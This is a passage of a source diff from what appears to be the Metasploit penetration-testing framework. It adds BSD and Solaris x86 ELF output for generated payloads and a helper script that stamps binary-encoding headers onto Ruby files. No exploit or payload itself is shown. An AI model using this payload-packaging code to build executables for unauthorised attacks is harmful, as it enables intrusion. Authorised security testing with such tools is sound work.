+ elsif(opts[:platform].index(Msf::Module::Platform::BSD))
+ if opts[:arch] =~ /x86/
+ elf = Msf::Util::EXE.to_bsd_x86_elf($framework, payload_raw, exeopts)
+ else
+ print_error("This format does not support that architecture")
+ exit
+ end
+ elsif(opts[:platform].index(Msf::Module::Platform::Solaris))
+ if opts[:arch] =~ /x86/
+ elf = Msf::Util::EXE.to_solaris_x86_elf($framework, payload_raw, exeopts)
+ else
+ print_error("This format does not support that architecture")
+ exit
+ end
end
$stdout.write elf
when /macho/i
diff --git a/tools/dev/set_binary_encoding.rb b/tools/dev/set_binary_encoding.rb
new file mode 100644
index 0000000000..511e03b54b
--- /dev/null
+++ b/tools/dev/set_binary_encoding.rb
@@ -0,0 +1,28 @@
+#!/usr/bin/env ruby
+# -*- coding: binary -*-
+
+str = '# -*- coding: binary -*-'
+
+fname = ARGV.shift || exit
+data = ''
+done = nil
+fd = ::File.open(fname, "rb")
+fd.each_line do |line|
+ if line =~ /^#.*coding:.*/
+ done = true
+ end
+
+ if not done
+ unless line =~ /^#\!.*env ruby/
+ data << str + "\n"
+ done = true
+ end
+ end
+
+ data << line
+end
+fd.close
+
+fd = ::File.open(fname, "wb")
+fd.write(data)
+fd.close